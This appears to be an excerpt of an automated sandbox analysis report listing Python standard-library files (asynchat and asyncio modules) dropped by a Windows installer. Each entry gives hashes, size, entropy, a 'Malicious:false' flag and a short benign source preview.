                                                                                                                                SHA-256:B6ACD96A45F30949973135F41DB2D992BB7D06A6B6FEFB2E3F12AF4035D3DD76
                                                                                                                                SHA-512:2CB7B565A8156C7A0904C0A045D2CD1B097BA04158EEB9B84F58C0D8814E41E0AB544206DEFC278BBF33DA325FF5EA25A67359BD8049D546CD71E4FB2676D007
                                                                                                                                Malicious:false
                                                                                                                                Preview:# -*- Mode: Python; tab-width: 4 -*-..# Id: asynchat.py,v 2.26 2000/09/07 22:29:26 rushing Exp..# Author: Sam Rushing <rushing@nightmare.com>....# ======================================================================..# Copyright 1996 by Sam Rushing..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software and..# its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of Sam..# Rushing not be used in advertising or publicity pertaining to..# distribution of the software without specific, written prior..# permission...#..# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,..# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN..# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, IND
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1234
                                                                                                                                Entropy (8bit):4.389215229914937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:cangJHXiJ6sam35P1cBwj6ju/EPvT+C2cNbgsr0rBP/iZ7Z3fNPS8Wmie/R54:cangJHXiJ6sRp1cBwj6q/EHT+NtwVgek
                                                                                                                                MD5:668C92DC624FD380C1BE65538A79171C
                                                                                                                                SHA1:43E513137311DCA21F44C9A1336C8A2EEB6380BC
                                                                                                                                SHA-256:43DF980C9E5B904B043E68329AD2617EBF4A280CC7585479F59C3B9BCF7005CF
                                                                                                                                SHA-512:3374153F41E44453BB280C4997AE16D264B5698696978CA5CFE980BCB67871838AF770B6BA38BF3FD801CB291825C99565F24C35EE7210F7429DA76D4F4D41AB
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""The asyncio package, tracking PEP 3156."""....# flake8: noqa....import sys....# This relies on each of the submodules having an __all__ variable...from .base_events import *..from .coroutines import *..from .events import *..from .exceptions import *..from .futures import *..from .locks import *..from .protocols import *..from .runners import *..from .queues import *..from .streams import *..from .subprocess import *..from .tasks import *..from .taskgroups import *..from .timeouts import *..from .threads import *..from .transports import *....__all__ = (base_events.__all__ +.. coroutines.__all__ +.. events.__all__ +.. exceptions.__all__ +.. futures.__all__ +.. locks.__all__ +.. protocols.__all__ +.. runners.__all__ +.. queues.__all__ +.. streams.__all__ +.. subprocess.__all__ +.. tasks.__all__ +.. threads.__all__ +.. timeouts.__all__ +.. transpo
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3468
                                                                                                                                Entropy (8bit):4.2876076098197755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:OzuFQi/qD6/ftAj2UKQOyRm3sSxvxY/yxgm6/Zz:Oe/1Aj2UXOyRmtxvxY/yxK/Zz
                                                                                                                                MD5:4C758632BA30CBD5CA8F50830E11975C
                                                                                                                                SHA1:832901CED4439EA98184031244AB36F500065094
                                                                                                                                SHA-256:82FDC4CD81292B82241AE8EAC259F977F33D7DF882EFC53B75C37C4CC85C525C
                                                                                                                                SHA-512:8660C250524FAC2BCC943A6539E66837DC2F2E4DAD582679C3BB472112C1E7207FE1F938AF0AE0A4423952D4997FB781C25D36E511548A6D4C0464A6FF3529BE
                                                                                                                                Malicious:false
                                                                                                                                Preview:import ast..import asyncio..import code..import concurrent.futures..import inspect..import sys..import threading..import types..import warnings....from . import futures......class AsyncIOInteractiveConsole(code.InteractiveConsole):.... def __init__(self, locals, loop):.. super().__init__(locals).. self.compile.compiler.flags |= ast.PyCF_ALLOW_TOP_LEVEL_AWAIT.... self.loop = loop.... def runcode(self, code):.. future = concurrent.futures.Future().... def callback():.. global repl_future.. global repl_future_interrupted.... repl_future = None.. repl_future_interrupted = False.... func = types.FunctionType(code, self.locals).. try:.. coro = func().. except SystemExit:.. raise.. except KeyboardInterrupt as ex:.. repl_future_interrupted = True.. future.set_exception(ex).. return..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):76247
                                                                                                                                Entropy (8bit):4.294355955171862
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:5D151xBrB8GWHQ0x41J7XLR+SQ8q75AikJJ2Qu3zy2cy:5D1m141J7XLR+F8q75omQu3us
                                                                                                                                MD5:D185635F6A604DF27BB90008701B6ABC
                                                                                                                                SHA1:254E2A9BD3551FCD06D001ABAC1876DD571DB48A
                                                                                                                                SHA-256:17258167E2A46FCE4E1FBF5E07C6DA72169D3022AEA477146F446D68E9227E08
                                                                                                                                SHA-512:D9AA359E26E30BBE9DE5D6A3D442707944782A2FFC55C86E8360078B8CBE65061173A3EC46C9F9F788ADF6F9601FE146FB02C5E8F9117ED65F6B689F4070E986
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Base implementation of event loop.....The event loop can be broken up into a multiplexer (the part..responsible for notifying us of I/O events) and the event loop proper,..which wraps a multiplexer with functionality for scheduling callbacks,..immediately or at a given time in the future.....Whenever a public API takes a callback, subsequent positional..arguments will be passed to the callback if/when it is called. This..avoids the proliferation of trivial lambdas implementing closures...Keyword arguments for the callback are not supported; this is a..conscious design decision, leaving the door open for keyword arguments..to modify the meaning of the API call itself..."""....import collections..import collections.abc..import concurrent.futures..import functools..import heapq..import itertools..import os..import socket..import stat..import subprocess..import threading..import time..import traceback..import sys..import warnings..import weakref....try:.. import ssl..except ImportEr
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2072
                                                                                                                                Entropy (8bit):4.7618893630736645
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:yeCRipB7FG3NtCPfOM3TW+yWzpbhTPUXUKyRbb2ubp:ye1euZPzpbp/H2uF
                                                                                                                                MD5:C43FF5138411952C7A12863B1431E489
                                                                                                                                SHA1:A016B8A45BFAB54DC81ECA89F779B94B3A01F61A
                                                                                                                                SHA-256:B7C83C0145384507FADF2B07D0C3EFA170EFA72965DF5A1FB0B7D54E839F2BC2
                                                                                                                                SHA-512:A23424F9FE3ACDBAFEE9FB814426CEB5F3C2BD06086ADE19A23C87806F88CBF0DF69B831877BE740EA58B051A820AD10CE8F1C2AF6D32901B13507DBB30FE3C9
                                                                                                                                Malicious:false
                                                                                                                                Preview:__all__ = ()....import reprlib..from _thread import get_ident....from . import format_helpers....# States for Future..._PENDING = 'PENDING'.._CANCELLED = 'CANCELLED'.._FINISHED = 'FINISHED'......def isfuture(obj):.. """Check for a Future..... This returns True when obj is a Future instance or is advertising.. itself as duck-type compatible by setting _asyncio_future_blocking... See comment in Future for more details... """.. return (hasattr(obj.__class__, '_asyncio_future_blocking') and.. obj._asyncio_future_blocking is not None)......def _format_callbacks(cb):.. """helper function for Future.__repr__""".. size = len(cb).. if not size:.. cb = ''.... def format_cb(callback):.. return format_helpers._format_callback_source(callback, ()).... if size == 1:.. cb = format_cb(cb[0][0]).. elif size == 2:.. cb = '{}, {}'.format(format_cb(cb[0][0]), format_cb(cb[1][0])).. elif size > 2:.. cb = '{}, <{} more>, {}
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9128
                                                                                                                                Entropy (8bit):4.251860245095017
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:lszIZ8MLHzG3Brs9pIKrlNtdpnqxfPx1BKV2acfn/CfNrPQh/Km:zZxK3pYplNtdNO7Msn/YPQh/5
                                                                                                                                MD5:19CC5FEA2559B817BF9FCAA3EE4B76B4
                                                                                                                                SHA1:7129D92BA411059492397735E82A2379E813FE46
                                                                                                                                SHA-256:FCD594ABA1912464A80B4C3E4651D5677787395541828A887EA1E0B3A16861FE
                                                                                                                                SHA-512:810F8D8D7B37733F03B19B17F641FBD91CC712C72FEAF657A2521111586DD8130622F3EEABD71EF47CC88D66987AA8E2CA672A2B1393CB0D4901A581D6E9A671
                                                                                                                                Malicious:false
                                                                                                                                Preview:import collections..import subprocess..import warnings....from . import protocols..from . import transports..from .log import logger......class BaseSubprocessTransport(transports.SubprocessTransport):.... def __init__(self, loop, protocol, args, shell,.. stdin, stdout, stderr, bufsize,.. waiter=None, extra=None, **kwargs):.. super().__init__(extra).. self._closed = False.. self._protocol = protocol.. self._loop = loop.. self._proc = None.. self._pid = None.. self._returncode = None.. self._exit_waiters = [].. self._pending_calls = collections.deque().. self._pipes = {}.. self._finished = False.... if stdin == subprocess.PIPE:.. self._pipes[0] = None.. if stdout == subprocess.PIPE:.. self._pipes[1] = None.. if stderr == subprocess.PIPE:.. self._pipes[2] = None.... # Create the child process: set the _proc attribute..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2736
                                                                                                                                Entropy (8bit):4.389117181651596
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MDlb5wrzhhBDgNuheP0PxxbycJw2O+wJouDpi4w8L2WvK7:MDl9kzTdg4gPw9ycJw2luD3w8L2yw
                                                                                                                                MD5:01752D1C01365EF997A988117465F1BE
                                                                                                                                SHA1:52EDAC2717DE1C5DE8B6E06C2355B5E01030443E
                                                                                                                                SHA-256:666CD17FBD8F88D2E65E15DAE32546AD858F4B0C28008D29BB5FEACEE75DE956
                                                                                                                                SHA-512:E8A1DF06149C82F7EFC54CB967D3981FC69ECBB57B33A66B976E545AE721F63EE2A2EE3A20988FC5C9F26FC04309B385D86027223BA0653572991EF284E5D395
                                                                                                                                Malicious:false
                                                                                                                                Preview:import linecache..import reprlib..import traceback....from . import base_futures..from . import coroutines......def _task_repr_info(task):.. info = base_futures._future_repr_info(task).... if task.cancelling() and not task.done():.. # replace status.. info[0] = 'cancelling'.... info.insert(1, 'name=%r' % task.get_name()).... coro = coroutines._format_coroutine(task._coro).. info.insert(2, f'coro=<{coro}>').... if task._fut_waiter is not None:.. info.insert(3, f'wait_for={task._fut_waiter!r}').. return info......@reprlib.recursive_repr()..def _task_repr(task):.. info = ' '.join(_task_repr_info(task)).. return f'<{task.__class__.__name__} {info}>'......def _task_get_stack(task, limit):.. frames = [].. if hasattr(task._coro, 'cr_frame'):.. # case 1: 'async def' coroutines.. f = task._coro.cr_frame.. elif hasattr(task._coro, 'gi_frame'):.. # case 2: legacy coroutines.. f = task._coro.gi_frame.. elif has
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1146
                                                                                                                                Entropy (8bit):5.268755765497679
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yD1CxjkkazhtNRHQVTLHhAWyVUqb1j+M2zV730JGvHApb/f:yJXhtD6hAWY7RCM4T0JGvHKf
                                                                                                                                MD5:57619284A2FF30EDA10BA9B8FC301928
                                                                                                                                SHA1:EDF902CC768972878289EC8BCA1D39EF3F813337
                                                                                                                                SHA-256:B560D3D7D6B60360FAA6DE80AC7340DB0654C107CF422346BEF3DA35A807BE93
                                                                                                                                SHA-512:3A81E529B55BB85490DD90EAA36F5CC1F726330E1752025EF15A83522E0FA4CD95BC6DD83D0CC856EFF0D866170B03878F47B4A1820589B3B7D9BC05A6C5FC65
                                                                                                                                Malicious:false
                                                                                                                                Preview:import enum....# After the connection is lost, log warnings after this many write()s...LOG_THRESHOLD_FOR_CONNLOST_WRITES = 5....# Seconds to wait before retrying accept()...ACCEPT_RETRY_DELAY = 1....# Number of stack entries to capture in debug mode...# The larger the number, the slower the operation in debug mode..# (see extract_stack() in format_helpers.py)...DEBUG_STACK_DEPTH = 10....# Number of seconds to wait for SSL handshake to complete..# The default timeout matches that of Nginx...SSL_HANDSHAKE_TIMEOUT = 60.0....# Number of seconds to wait for SSL shutdown to complete..# The default timeout mimics lingering_time..SSL_SHUTDOWN_TIMEOUT = 30.0....# Used in sendfile fallback code. We use fallback for platforms..# that don't support sendfile, or for TLS connections...SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 256....FLOW_CONTROL_HIGH_WATER_SSL_READ = 256 # KiB..FLOW_CONTROL_HIGH_WATER_SSL_WRITE = 512 # KiB....# The enum should be here to break circular dependencies between..# ba
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3511
                                                                                                                                Entropy (8bit):4.544109277860668
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:I+pQMzMBTJpOqy6fpZ6c7XFNry/ORKsoSSS35prVq/sP0O4H2aFEhU:FpQMzmTJpOl6RZ6F/gKsgDspiEhU
                                                                                                                                MD5:9AB779C5674E3623407E9D455A55AAA7
                                                                                                                                SHA1:77B61D5BAFB4E4DF73F143E5D6B7D338F5B0E80B
                                                                                                                                SHA-256:4E6024693C2BF7501E22C671189C5C58C0E460E191A623752A04705837C59CCA
                                                                                                                                SHA-512:9ED47A627053B1F623F04DA96C7718EB16006B0E53F958713C287CE2457B521F0F20D098667C71DEBF5D6D466154477003A6057E906F0DC96453F5992F41A9F1
                                                                                                                                Malicious:false
                                                                                                                                Preview:__all__ = 'iscoroutinefunction', 'iscoroutine'....import collections.abc..import inspect..import os..import sys..import traceback..import types......def _is_debug_mode():.. # See: https://docs.python.org/3/library/asyncio-dev.html#asyncio-debug-mode... return sys.flags.dev_mode or (not sys.flags.ignore_environment and.. bool(os.environ.get('PYTHONASYNCIODEBUG')))......# A marker for iscoroutinefunction..._is_coroutine = object()......def iscoroutinefunction(func):.. """Return True if func is a decorated coroutine function.""".. return (inspect.iscoroutinefunction(func) or.. getattr(func, '_is_coroutine', None) is _is_coroutine)......# Prioritize native coroutine check to speed-up..# asyncio.iscoroutine..._COROUTINE_TYPES = (types.CoroutineType, types.GeneratorType,.. collections.abc.Coroutine).._iscoroutine_typecache = set()......def iscoroutine(obj):.. """Return True if obj is a coroutine object.""".. if
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):29142
                                                                                                                                Entropy (8bit):4.5016028409212865
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:/6h8+ImJcD+fTXApG34ZhB5H++WWzPIAeCv:/6DcDwNoj++W2IAeCv
                                                                                                                                MD5:E92ACE54545230913CBE25A33F0CDEFA
                                                                                                                                SHA1:F8389E8E9928C108DAED51689BBEFB9205B57240
                                                                                                                                SHA-256:0C509EE71A042DC64D131F60FB267567B006A1A321740168EE6A103B665F7270
                                                                                                                                SHA-512:DB4B33BBFDB2662B63CFC2370DF1429619610F2A22786074AD46AA866BB5D390F60988780806CB8102E4EB6DF15BA38235C0D9ADAF7DCCCBC12E6E7CDDB28C63
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Event loop and event loop policy."""....__all__ = (.. 'AbstractEventLoopPolicy',.. 'AbstractEventLoop', 'AbstractServer',.. 'Handle', 'TimerHandle',.. 'get_event_loop_policy', 'set_event_loop_policy',.. 'get_event_loop', 'set_event_loop', 'new_event_loop',.. 'get_child_watcher', 'set_child_watcher',.. '_set_running_loop', 'get_running_loop',.. '_get_running_loop',..)....import contextvars..import os..import socket..import subprocess..import sys..import threading....from . import format_helpers......class Handle:.. """Object returned by callback registration methods.""".... __slots__ = ('_callback', '_args', '_cancelled', '_loop',.. '_source_traceback', '_repr', '__weakref__',.. '_context').... def __init__(self, callback, args, loop, context=None):.. if context is None:.. context = contextvars.copy_context().. self._context = context.. self._loop = loop.. self._callback = callback
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1814
                                                                                                                                Entropy (8bit):4.664597808201475
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:Ad3QZbzX+MkvODzN3Z1zULxID+XvsaAWl2iyjDzPfgEBF6R9TaAs3hxER:iAJrzOMXzULxy+/sa/l2nzP4EMaBhxER
                                                                                                                                MD5:23C13351D6533C00C8E7707467D75E8A
                                                                                                                                SHA1:DEBE33F3B0AD9A330B90B2271E737646839814BE
                                                                                                                                SHA-256:A49AA2489262C47EE91528550EF464F1139E873DD5F1A3F18C3C099A0145E195
                                                                                                                                SHA-512:4D7AA609DCEFF0879B42B02C5985A550E85AD8B78AA33C0A3744B2DEC303BFAB7BD6D27662BC1B816E346E49B9466D6913F93B7D2ED10165C83AC261DEECC31A
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""asyncio exceptions."""......__all__ = ('BrokenBarrierError',.. 'CancelledError', 'InvalidStateError', 'TimeoutError',.. 'IncompleteReadError', 'LimitOverrunError',.. 'SendfileNotAvailableError')......class CancelledError(BaseException):.. """The Future or Task was cancelled."""......TimeoutError = TimeoutError # make local alias for the standard exception......class InvalidStateError(Exception):.. """The operation is not allowed in this state."""......class SendfileNotAvailableError(RuntimeError):.. """Sendfile syscall is not available..... Raised if OS does not support sendfile syscall for given socket or.. file type... """......class IncompleteReadError(EOFError):.. """.. Incomplete read error. Attributes:.... - partial: read bytes string before the end of stream was reached.. - expected: total number of expected bytes (or None if unknown).. """.. def __init__(self, partial, expected):.. r_expected = 'undefi
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2480
                                                                                                                                Entropy (8bit):4.6056367555974065
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:g863N4N9017WBmO9uMxP6U8QtUUIKOxYJCd67PiJQUhAs42eDv4mQ0L0j:g863NC9IiBmKxiUlWVKPJCs7oQUhANLi
                                                                                                                                MD5:64D0BFEF9B45C0EA83D954360F021869
                                                                                                                                SHA1:1BD55E0614613C37EADBD77188962F3BD5F28E30
                                                                                                                                SHA-256:657449627E8706CDC28A575DF9E975058E787FA2CC6A70B5DA7F9EB39D371DCB
                                                                                                                                SHA-512:23583958AAFD449B0B9991A0CFE569092D22684464F4DB3400C8E56B22CE127C0E73E94D59C976ECC40A70F2FE850164DF7AAB1A147629AF45BC7145B1C6BE9D
                                                                                                                                Malicious:false
                                                                                                                                Preview:import functools..import inspect..import reprlib..import sys..import traceback....from . import constants......def _get_function_source(func):.. func = inspect.unwrap(func).. if inspect.isfunction(func):.. code = func.__code__.. return (code.co_filename, code.co_firstlineno).. if isinstance(func, functools.partial):.. return _get_function_source(func.func).. if isinstance(func, functools.partialmethod):.. return _get_function_source(func.func).. return None......def _format_callback_source(func, args):.. func_repr = _format_callback(func, args, None).. source = _get_function_source(func).. if source:.. func_repr += f' at {source[0]}:{source[1]}'.. return func_repr......def _format_args_and_kwargs(args, kwargs):.. """Format function arguments and keyword arguments..... Special case for a single parameter: ('hello',) is formatted as ('hello')... """.. # use reprlib to limit the length of the output.. items = [].
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14577
                                                                                                                                Entropy (8bit):4.476875790395743
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:RH8T77Dp/ndJtDT7umUctWcOXOK4Uf6YRFTR/iNxzLdefQ9c0k+:FwN/ndJtxZtWcy4k5E/g2D1
                                                                                                                                MD5:8FF1B21F41454088843DD47584D3664F
                                                                                                                                SHA1:C8D35E3E70452C2E64F4C8E039E68BAB1695DCE2
                                                                                                                                SHA-256:AA2C83BB652BD0A01BC3109BD749F997DD9B74527971D5409F138E0654A5717D
                                                                                                                                SHA-512:08CAFDC18B4AB3CFC87EC1E40F3F033AE2F0CC36BFF9E672EF3451E03CDE33DF31B1E4B21DCC92F29C0D177FD2C85A6A5927DF52EE93D7C16C98314474013C0F
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""A Future class similar to the one in PEP 3148."""....__all__ = (.. 'Future', 'wrap_future', 'isfuture',..)....import concurrent.futures..import contextvars..import logging..import sys..from types import GenericAlias....from . import base_futures..from . import events..from . import exceptions..from . import format_helpers......isfuture = base_futures.isfuture......_PENDING = base_futures._PENDING.._CANCELLED = base_futures._CANCELLED.._FINISHED = base_futures._FINISHED......STACK_DEBUG = logging.DEBUG - 1 # heavy-duty debugging......class Future:.. """This class is *almost* compatible with concurrent.futures.Future..... Differences:.... - This class is not thread-safe..... - result() and exception() do not take a timeout argument and.. raise an exception when the future isn't done yet..... - Callbacks registered with add_done_callback() are always called.. via the event loop's call_soon()..... - This class is not compatible with the wait() and as_comp
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):19601
                                                                                                                                Entropy (8bit):4.377462625880585
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:j89yYtua1IhkzLJInU/iI7xyV+Wea/k7mt4YeJV8PxbLosoqL/Nl/1BbW5ZxZHZn:j89SViBVIoui5b2sC/my+nJvlWJEjgi
                                                                                                                                MD5:94DBDE38B8AFB11B316E16D1D2E3A15F
                                                                                                                                SHA1:FC8D86CCB4C3E062DA5506C2DB54AA12789AA1EE
                                                                                                                                SHA-256:D881EB6B28F8DB4B53F1AA17705FB6B2ED5617CA8784CE3F101E8BF3A8EC05E8
                                                                                                                                SHA-512:0ADE4456239385FCDC8E476590F4E041EAC7E69993545CAE12296E6D74412F4916BF1CD52DE1292CE06FF03718418361D3092BA6B45363C641AED2E82774EA56
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Synchronization primitives."""....__all__ = ('Lock', 'Event', 'Condition', 'Semaphore',.. 'BoundedSemaphore', 'Barrier')....import collections..import enum....from . import exceptions..from . import mixins..from . import tasks....class _ContextManagerMixin:.. async def __aenter__(self):.. await self.acquire().. # We have no use for the "as ..." clause in the with.. # statement for locks... return None.... async def __aexit__(self, exc_type, exc, tb):.. self.release()......class Lock(_ContextManagerMixin, mixins._LoopBoundMixin):.. """Primitive lock objects..... A primitive lock is a synchronization primitive that is not owned.. by a particular coroutine when locked. A primitive lock is in one.. of two states, 'locked' or 'unlocked'..... It is created in the unlocked state. It has two basic methods,.. acquire() and release(). When the state is unlocked, acquire().. changes the state to locked and returns imme
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):131
                                                                                                                                Entropy (8bit):4.37276371888401
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:W5DQIMeHnoHIgXAgCrovYSNAFWAX+k++SoRKt1zC2QK466AGB:8QIbnoHXe+bPAukNSoRKtQW6Au
                                                                                                                                MD5:07687A8E3B30B3B320A3B3164812E3B1
                                                                                                                                SHA1:04A117C1275B17E12EC9527F49CA74399F9FFB28
                                                                                                                                SHA-256:72433D0D5A4205B74EF4FF95CD3E1C8D98960A58371E5546698A3A38F231058C
                                                                                                                                SHA-512:E2C8DE755A6281245B0A25BA20F4956EBDBB83AD375DEC62A93310C7D5F1BF12B10A7467807272B7323EB5D0C9CF3771421100B588A78945EEB972D768ED52FA
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Logging configuration."""....import logging......# Name the logger after the package...logger = logging.getLogger(__package__)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):502
                                                                                                                                Entropy (8bit):4.264038214993239
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:2Ajxj4XvQtLTFL6Niuh2AakLv1G/HtpNDeidJKwQMTJy9MBXcAKKPksQBd8clRYR:20t1eh0DqvkX9KRfuPLDclRYR
                                                                                                                                MD5:592AD5057035FBE84AF5222A68FD2D7E
                                                                                                                                SHA1:C7FCBB8D67F25C9B9C46639EC1D0B78A2DE8B102
                                                                                                                                SHA-256:F5055BBC8622C99F91EF58024D4655209C904AB43F11498ADFB6218C127F9946
                                                                                                                                SHA-512:341D4C1B301632B51DD0F8B10F298745FC75994ABCC8C75F962C96BC155A4302A60F79998FDF2F927705E3EA060FEA6686151DF9094CC72025D5A4D2692A3599
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Event loop mixins."""....import threading..from . import events...._global_lock = threading.Lock()......class _LoopBoundMixin:.. _loop = None.... def _get_loop(self):.. loop = events._get_running_loop().... if self._loop is None:.. with _global_lock:.. if self._loop is None:.. self._loop = loop.. if loop is not self._loop:.. raise RuntimeError(f'{self!r} is bound to a different event loop').. return loop..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33968
                                                                                                                                Entropy (8bit):4.237305814009931
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:HTTnLvasHTpbMaZrfo2T/qnmaT3sqHBBtKyR:HppNfo8aT3sI1R
                                                                                                                                MD5:112DF13328C3FEB3EE238D4790DF4845
                                                                                                                                SHA1:098ED8120A3E97E43AB6620B41E899FCEBCD33A2
                                                                                                                                SHA-256:33B0FE52E19D717655F7D989B61A34ED80124F2F75DF33D1925B1AFB815A5C43
                                                                                                                                SHA-512:BCB4D84D28F43D9FB73F6239B15F2DA99D3848439F59A5349F9F911314BB94E8A6E1CD9EB572A152C9AD30F8639C029C6E6C7129C271547D8975164D1A0C55D7
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Event loop using a proactor and related classes.....A proactor is a "notify-on-completion" multiplexer. Currently a..proactor is only implemented on Windows with IOCP..."""....__all__ = 'BaseProactorEventLoop',....import io..import os..import socket..import warnings..import signal..import threading..import collections....from . import base_events..from . import constants..from . import futures..from . import exceptions..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger......def _set_socket_extra(transport, sock):.. transport._extra['socket'] = trsock.TransportSocket(sock).... try:.. transport._extra['sockname'] = sock.getsockname().. except socket.error:.. if transport._loop.get_debug():.. logger.warning(.. "getsockname() failed on %r", sock, exc_info=True).... if 'peername' not in transport._extra:.. try:.. transport._extra['peername'] = sock
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7173
                                                                                                                                Entropy (8bit):4.508690129802189
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:GvIrPBEBCe7pXv83jwbtB2S1KnUB/MB2E505cFj:GvsqNVETwmSwU5hE5Z
                                                                                                                                MD5:AA57F822D953D524C717845CF040C7A8
                                                                                                                                SHA1:4A044088F18490FD5E29F132BA5EC1224C723BB9
                                                                                                                                SHA-256:66038B46A3D99B358166A061B9D5E9486CDDB9626D84C34F343640BB0D0EEC0A
                                                                                                                                SHA-512:A3FB50B69AA2523C17AE04B7562B42EBE2FB5F9EA5B23403EE9D92059C7B23727F30867FA561EC7E165D21B77C6F84F0024972D7335ADB09245198935985234B
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Abstract Protocol base classes."""....__all__ = (.. 'BaseProtocol', 'Protocol', 'DatagramProtocol',.. 'SubprocessProtocol', 'BufferedProtocol',..)......class BaseProtocol:.. """Common base class for protocol interfaces..... Usually user implements protocols that derived from BaseProtocol.. like Protocol or ProcessProtocol..... The only case when BaseProtocol should be implemented directly is.. write-only transport like write pipe.. """.... __slots__ = ().... def connection_made(self, transport):.. """Called when a connection is made..... The argument is the transport representing the pipe connection... To receive data, wait for data_received() calls... When the connection is closed, connection_lost() is called... """.... def connection_lost(self, exc):.. """Called when the connection is lost or closed..... The argument is an exception object or None (the latter.. meaning a regular EOF is receive
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8218
                                                                                                                                Entropy (8bit):4.355264320169499
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:ZihNcb/YAsKXSWefpst8gcyTD6NKN2q2p9As/g2pbq8UXZbFLLBk3:ucbQfKX/6pXOXe+AL2ZJs
                                                                                                                                MD5:AA07F295C880EFCF11114F912DA15556
                                                                                                                                SHA1:15684100DC5BD09ED682FD4DD3F16FAB106F1500
                                                                                                                                SHA-256:77EA57D6C140F46FF1740FE0948894E43A77D6CFD3F03720DBDC7F5B72F03127
                                                                                                                                SHA-512:621441FAFE32F5C10461734286BA330FAD6A65473CE8CCC90080491EEB186DA99D28FDA8F48361A241388FFE061B0E545F8E8A32742295582A30FCDF97264348
                                                                                                                                Malicious:false
